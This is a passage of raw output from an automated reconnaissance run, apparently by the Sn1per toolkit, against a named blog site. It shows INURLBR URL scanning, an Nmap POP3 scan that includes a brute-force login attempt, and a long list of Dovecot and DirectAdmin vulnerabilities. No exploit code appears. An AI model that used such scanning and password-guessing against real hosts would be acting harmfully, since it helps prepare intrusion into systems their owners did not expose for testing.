3620|_[ + ] Target:: [ http://idolblog.tv/page/56/ ]
3621|_[ + ] Exploit::
3622|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3623|_[ + ] More details:: / - / , ISP:
3624|_[ + ] Found:: UNIDENTIFIED
3625
3626 _[ - ]::--------------------------------------------------------------------------------------------------------------
3627|_[ + ] [ 72 / 100 ]-[03:47:05] [ - ]
3628|_[ + ] Target:: [ http://idolblog.tv/32979-2/ ]
3629|_[ + ] Exploit::
3630|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3631|_[ + ] More details:: / - / , ISP:
3632|_[ + ] Found:: UNIDENTIFIED
3633
3634 _[ - ]::--------------------------------------------------------------------------------------------------------------
3635|_[ + ] [ 73 / 100 ]-[03:47:08] [ - ]
3636|_[ + ] Target:: [ http://idolblog.tv/page/101/ ]
3637|_[ + ] Exploit::
3638|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3639|_[ + ] More details:: / - / , ISP:
3640|_[ + ] Found:: UNIDENTIFIED
3641
3642 _[ - ]::--------------------------------------------------------------------------------------------------------------
3643|_[ + ] [ 74 / 100 ]-[03:47:11] [ - ]
3644|_[ + ] Target:: [ http://idolblog.tv/category/dvds/ ]
3645|_[ + ] Exploit::
3646|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3647|_[ + ] More details:: / - / , ISP:
3648|_[ + ] Found:: UNIDENTIFIED
3649
3650 _[ - ]::--------------------------------------------------------------------------------------------------------------
3651|_[ + ] [ 75 / 100 ]-[03:47:15] [ - ]
3652|_[ + ] Target:: [ http://idolblog.tv/page/18/ ]
3653|_[ + ] Exploit::
3654|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3655|_[ + ] More details:: / - / , ISP:
3656|_[ + ] Found:: UNIDENTIFIED
3657
3658 _[ - ]::--------------------------------------------------------------------------------------------------------------
3659|_[ + ] [ 76 / 100 ]-[03:47:19] [ - ]
3660|_[ + ] Target:: [ http://idolblog.tv/page/108/ ]
3661|_[ + ] Exploit::
3662|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3663|_[ + ] More details:: / - / , ISP:
3664|_[ + ] Found:: UNIDENTIFIED
3665
3666 _[ - ]::--------------------------------------------------------------------------------------------------------------
3667|_[ + ] [ 77 / 100 ]-[03:47:23] [ - ]
3668|_[ + ] Target:: [ http://idolblog.tv/page/57/ ]
3669|_[ + ] Exploit::
3670|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3671|_[ + ] More details:: / - / , ISP:
3672|_[ + ] Found:: UNIDENTIFIED
3673
3674 _[ - ]::--------------------------------------------------------------------------------------------------------------
3675|_[ + ] [ 78 / 100 ]-[03:47:26] [ - ]
3676|_[ + ] Target:: [ http://idolblog.tv/page/152/ ]
3677|_[ + ] Exploit::
3678|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3679|_[ + ] More details:: / - / , ISP:
3680|_[ + ] Found:: UNIDENTIFIED
3681
3682 _[ - ]::--------------------------------------------------------------------------------------------------------------
3683|_[ + ] [ 79 / 100 ]-[03:47:29] [ - ]
3684|_[ + ] Target:: [ http://idolblog.tv/page/143/ ]
3685|_[ + ] Exploit::
3686|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3687|_[ + ] More details:: / - / , ISP:
3688|_[ + ] Found:: UNIDENTIFIED
3689
3690 _[ - ]::--------------------------------------------------------------------------------------------------------------
3691|_[ + ] [ 80 / 100 ]-[03:47:31] [ - ]
3692|_[ + ] Target:: [ http://idolblog.tv/page/49/ ]
3693|_[ + ] Exploit::
3694|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3695|_[ + ] More details:: / - / , ISP:
3696|_[ + ] Found:: UNIDENTIFIED
3697
3698 _[ - ]::--------------------------------------------------------------------------------------------------------------
3699|_[ + ] [ 81 / 100 ]-[03:47:34] [ - ]
3700|_[ + ] Target:: [ http://idolblog.tv/page/68/ ]
3701|_[ + ] Exploit::
3702|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3703|_[ + ] More details:: / - / , ISP:
3704|_[ + ] Found:: UNIDENTIFIED
3705
3706 _[ - ]::--------------------------------------------------------------------------------------------------------------
3707|_[ + ] [ 82 / 100 ]-[03:47:37] [ - ]
3708|_[ + ] Target:: [ http://idolblog.tv/tag/erika/ ]
3709|_[ + ] Exploit::
3710|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3711|_[ + ] More details:: / - / , ISP:
3712|_[ + ] Found:: UNIDENTIFIED
3713
3714 _[ - ]::--------------------------------------------------------------------------------------------------------------
3715|_[ + ] [ 83 / 100 ]-[03:47:39] [ - ]
3716|_[ + ] Target:: [ http://idolblog.tv/page/109/ ]
3717|_[ + ] Exploit::
3718|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3719|_[ + ] More details:: / - / , ISP:
3720|_[ + ] Found:: UNIDENTIFIED
3721
3722 _[ - ]::--------------------------------------------------------------------------------------------------------------
3723|_[ + ] [ 84 / 100 ]-[03:47:42] [ - ]
3724|_[ + ] Target:: [ http://idolblog.tv/category/photobooks/ ]
3725|_[ + ] Exploit::
3726|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3727|_[ + ] More details:: / - / , ISP:
3728|_[ + ] Found:: UNIDENTIFIED
3729
3730 _[ - ]::--------------------------------------------------------------------------------------------------------------
3731|_[ + ] [ 85 / 100 ]-[03:47:45] [ - ]
3732|_[ + ] Target:: [ http://idolblog.tv/page/115/ ]
3733|_[ + ] Exploit::
3734|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3735|_[ + ] More details:: / - / , ISP:
3736|_[ + ] Found:: UNIDENTIFIED
3737
3738 _[ - ]::--------------------------------------------------------------------------------------------------------------
3739|_[ + ] [ 86 / 100 ]-[03:47:47] [ - ]
3740|_[ + ] Target:: [ http://idolblog.tv/page/26/ ]
3741|_[ + ] Exploit::
3742|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3743|_[ + ] More details:: / - / , ISP:
3744|_[ + ] Found:: UNIDENTIFIED
3745
3746 _[ - ]::--------------------------------------------------------------------------------------------------------------
3747|_[ + ] [ 87 / 100 ]-[03:47:50] [ - ]
3748|_[ + ] Target:: [ http://idolblog.tv/page/32/ ]
3749|_[ + ] Exploit::
3750|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3751|_[ + ] More details:: / - / , ISP:
3752|_[ + ] Found:: UNIDENTIFIED
3753
3754 _[ - ]::--------------------------------------------------------------------------------------------------------------
3755|_[ + ] [ 88 / 100 ]-[03:47:53] [ - ]
3756|_[ + ] Target:: [ http://idolblog.tv/page/27/ ]
3757|_[ + ] Exploit::
3758|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3759|_[ + ] More details:: / - / , ISP:
3760|_[ + ] Found:: UNIDENTIFIED
3761
3762 _[ - ]::--------------------------------------------------------------------------------------------------------------
3763|_[ + ] [ 89 / 100 ]-[03:47:55] [ - ]
3764|_[ + ] Target:: [ http://idolblog.tv/page/52/ ]
3765|_[ + ] Exploit::
3766|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3767|_[ + ] More details:: / - / , ISP:
3768|_[ + ] Found:: UNIDENTIFIED
3769
3770 _[ - ]::--------------------------------------------------------------------------------------------------------------
3771|_[ + ] [ 90 / 100 ]-[03:47:59] [ - ]
3772|_[ + ] Target:: [ http://idolblog.tv/page/85/ ]
3773|_[ + ] Exploit::
3774|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3775|_[ + ] More details:: / - / , ISP:
3776|_[ + ] Found:: UNIDENTIFIED
3777
3778 _[ - ]::--------------------------------------------------------------------------------------------------------------
3779|_[ + ] [ 91 / 100 ]-[03:48:02] [ - ]
3780|_[ + ] Target:: [ http://idolblog.tv/page/10/ ]
3781|_[ + ] Exploit::
3782|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3783|_[ + ] More details:: / - / , ISP:
3784|_[ + ] Found:: UNIDENTIFIED
3785
3786 _[ - ]::--------------------------------------------------------------------------------------------------------------
3787|_[ + ] [ 92 / 100 ]-[03:48:05] [ - ]
3788|_[ + ] Target:: [ http://idolblog.tv/author/idolblog/ ]
3789|_[ + ] Exploit::
3790|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3791|_[ + ] More details:: / - / , ISP:
3792|_[ + ] Found:: UNIDENTIFIED
3793
3794 _[ - ]::--------------------------------------------------------------------------------------------------------------
3795|_[ + ] [ 93 / 100 ]-[03:48:08] [ - ]
3796|_[ + ] Target:: [ http://idolblog.tv/page/157/ ]
3797|_[ + ] Exploit::
3798|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3799|_[ + ] More details:: / - / , ISP:
3800|_[ + ] Found:: UNIDENTIFIED
3801
3802 _[ - ]::--------------------------------------------------------------------------------------------------------------
3803|_[ + ] [ 94 / 100 ]-[03:48:11] [ - ]
3804|_[ + ] Target:: [ http://idolblog.tv/page/103/ ]
3805|_[ + ] Exploit::
3806|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3807|_[ + ] More details:: / - / , ISP:
3808|_[ + ] Found:: UNIDENTIFIED
3809
3810 _[ - ]::--------------------------------------------------------------------------------------------------------------
3811|_[ + ] [ 95 / 100 ]-[03:48:14] [ - ]
3812|_[ + ] Target:: [ http://idolblog.tv/page/63/ ]
3813|_[ + ] Exploit::
3814|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3815|_[ + ] More details:: / - / , ISP:
3816|_[ + ] Found:: UNIDENTIFIED
3817
3818 _[ - ]::--------------------------------------------------------------------------------------------------------------
3819|_[ + ] [ 96 / 100 ]-[03:48:17] [ - ]
3820|_[ + ] Target:: [ http://idolblog.tv/category/other/ ]
3821|_[ + ] Exploit::
3822|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3823|_[ + ] More details:: / - / , ISP:
3824|_[ + ] Found:: UNIDENTIFIED
3825
3826 _[ - ]::--------------------------------------------------------------------------------------------------------------
3827|_[ + ] [ 97 / 100 ]-[03:48:19] [ - ]
3828|_[ + ] Target:: [ http://idolblog.tv/page/129/ ]
3829|_[ + ] Exploit::
3830|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3831|_[ + ] More details:: / - / , ISP:
3832|_[ + ] Found:: UNIDENTIFIED
3833
3834 _[ - ]::--------------------------------------------------------------------------------------------------------------
3835|_[ + ] [ 98 / 100 ]-[03:48:22] [ - ]
3836|_[ + ] Target:: [ http://idolblog.tv/page/9/ ]
3837|_[ + ] Exploit::
3838|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3839|_[ + ] More details:: / - / , ISP:
3840|_[ + ] Found:: UNIDENTIFIED
3841
3842 _[ - ]::--------------------------------------------------------------------------------------------------------------
3843|_[ + ] [ 99 / 100 ]-[03:48:25] [ - ]
3844|_[ + ] Target:: [ http://idolblog.tv/page/133/ ]
3845|_[ + ] Exploit::
3846|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3847|_[ + ] More details:: / - / , ISP:
3848|_[ + ] Found:: UNIDENTIFIED
3849
3850[ INFO ] [ Shutting down ]
3851[ INFO ] [ End of process INURLBR at [20-07-2019 03:48:25]
3852[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
3853[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/idolblog.tv/output/inurlbr-idolblog.tv ]
3854|_________________________________________________________________________________________
3855
3856\_________________________________________________________________________________________/
3857#######################################################################################################################################
3858Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 03:48 EDT
3859Nmap scan report for idolblog.tv (89.248.174.131)
3860Host is up (0.24s latency).
3861
3862PORT STATE SERVICE VERSION
3863110/tcp open pop3 Dovecot DirectAdmin pop3d
3864| pop3-brute:
3865| Accounts: No valid accounts found
3866|_ Statistics: Performed 205 guesses in 184 seconds, average tps: 1.0
3867|_pop3-capabilities: PIPELINING UIDL TOP CAPA AUTH-RESP-CODE SASL(PLAIN) USER STLS RESP-CODES
3868| vulscan: VulDB - https://vuldb.com:
3869| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
3870| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
3871| [134243] InfinitumIT DirectAdmin up to 1.561 FileManager CSRF privilege escalation
3872| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
3873| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
3874| [131477] JBMC DirectAdmin 1.55 /CMD_ACCOUNT_ADMIN cross site request forgery
3875| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
3876| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
3877| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
3878| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
3879| [112266] JBMC DirectAdmin up to 1.51 email_ftp_password_change Setting memory corruption
3880| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
3881| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
3882| [95172] Directadmin Controlpanel 1.50.1 /CMD_SELECT_USERS cross site scripting
3883| [95100] DirectAdmin up to 1.50.1 Crash denial of service
3884| [69835] Dovecot 2.2.0/2.2.1 denial of service
3885| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
3886| [65684] Dovecot up to 2.2.6 unknown vulnerability
3887| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
3888| [63692] Dovecot up to 2.0.15 spoofing
3889| [7062] Dovecot 2.1.10 mail-search.c denial of service
3890| [62578] DirectAdmin 1.403 cross site scripting
3891| [61198] Jbmc-software DirectAdmin 1.403 cross site scripting
3892| [57517] Dovecot up to 2.0.12 Login directory traversal
3893| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
3894| [57515] Dovecot up to 2.0.12 Crash denial of service
3895| [54944] Dovecot up to 1.2.14 denial of service
3896| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
3897| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
3898| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
3899| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
3900| [53277] Dovecot up to 1.2.10 denial of service
3901| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
3902| [48756] Jbmc-software DirectAdmin up to 1.292 cross site scripting
3903| [48060] Jbmc-software DirectAdmin up to 1.17 privilege escalation
3904| [45256] Dovecot up to 1.1.5 directory traversal
3905| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
3906| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
3907| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
3908| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
3909| [40356] Dovecot 1.0.9 Cache unknown vulnerability
3910| [38747] DirectAdmin 1.30.2 cross site scripting
3911| [38222] Dovecot 1.0.2 directory traversal
3912| [37578] DirectAdmin 1.30.1 cross site scripting
3913| [36376] Dovecot up to 1.0.x directory traversal
3914| [36066] JBMC Software DirectAdmin 1.293 cross site scripting
3915| [35680] Jbmc Software DirectAdmin 1.293 cross site scripting
3916| [33341] JBMC Software DirectAdmin 1.28.1 cross site scripting
3917| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
3918| [30268] Timo Sirainen Dovecot 1.0/1.0 Beta2/1.0 Beta3/1.0 Beta7 directory traversal
3919| [30021] Jbmc Software DirectAdmin 1.26.6 cross site scripting
3920|
3921| MITRE CVE - https://cve.mitre.org:
3922| [CVE-2012-5305] Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
3923| [CVE-2012-3842] Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) select0 or (2) select8 parameters.
3924| [CVE-2011-5033] Stack-based buffer overflow in CFS.c in ConfigServer Security & Firewall (CSF) before 5.43, when running on a DirectAdmin server, allows local users to cause a denial of service (crash) via a long string in an admin.list file.
3925| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
3926| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
3927| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
3928| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
3929| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
3930| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
3931| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
3932| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
3933| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
3934| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
3935| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
3936| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
3937| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
3938| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
3939| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
3940| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
3941| [CVE-2009-2216] Cross-site scripting (XSS) vulnerability in CMD_REDIRECT in DirectAdmin 1.33.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the URI in a view=advanced request.
3942| [CVE-2009-1526] JBMC Software DirectAdmin before 1.334 allows local users to create or overwrite any file via a symlink attack on an arbitrary file in a certain temporary directory, related to a request for this temporary file in the PATH_INFO to the CMD_DB script during a backup action.
3943| [CVE-2009-1525] CMD_DB in JBMC Software DirectAdmin before 1.334 allows remote authenticated users to gain privileges via shell metacharacters in the name parameter during a restore action.
3944| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
3945| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
3946| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
3947| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
3948| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
3949| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
3950| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
3951| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
3952| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
3953| [CVE-2007-4830] Cross-site scripting (XSS) vulnerability in CMD_BANDWIDTH_BREAKDOWN in DirectAdmin 1.30.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter.
3954| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
3955| [CVE-2007-3501] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin 1.30.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vector than CVE-2007-1508.
3956| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
3957| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
3958| [CVE-2007-1926] Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log
3959| [CVE-2007-1508] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin allows remote attackers to inject arbitrary web script or HTML via the RESULT parameter, a different vector than CVE-2006-5983.
3960| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
3961| [CVE-2006-5983] Multiple cross-site scripting (XSS) vulnerabilities in JBMC Software DirectAdmin 1.28.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) user parameter to (a) CMD_SHOW_RESELLER or (b) CMD_SHOW_USER in the Admin level
3962| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
3963| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
3964| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
3965| [CVE-2006-2153] Cross-site scripting (XSS) vulnerability in HTM_PASSWD in DirectAdmin Hosting Management allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
3966| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
3967| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
3968| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
3969| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
3970| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
3971|
3972| SecurityFocus - https://www.securityfocus.com/bid/:
3973| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
3974| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
3975| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
3976| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
3977| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
3978| [83952] DirectAdmin CVE-2006-2153 Cross-Site Scripting Vulnerability
3979| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
3980| [67306] Dovecot Denial of Service Vulnerability
3981| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
3982| [63911] Installatron Plugin for DirectAdmin Insecure Temporary File Creation Vulnerability
3983| [63373] Installatron Plugin for DirectAdmin cURL Output Remote Privilege Escalation Vulnerability
3984| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
3985| [62929] DirectAdmin Backup Multiple Security Vulnerabilities
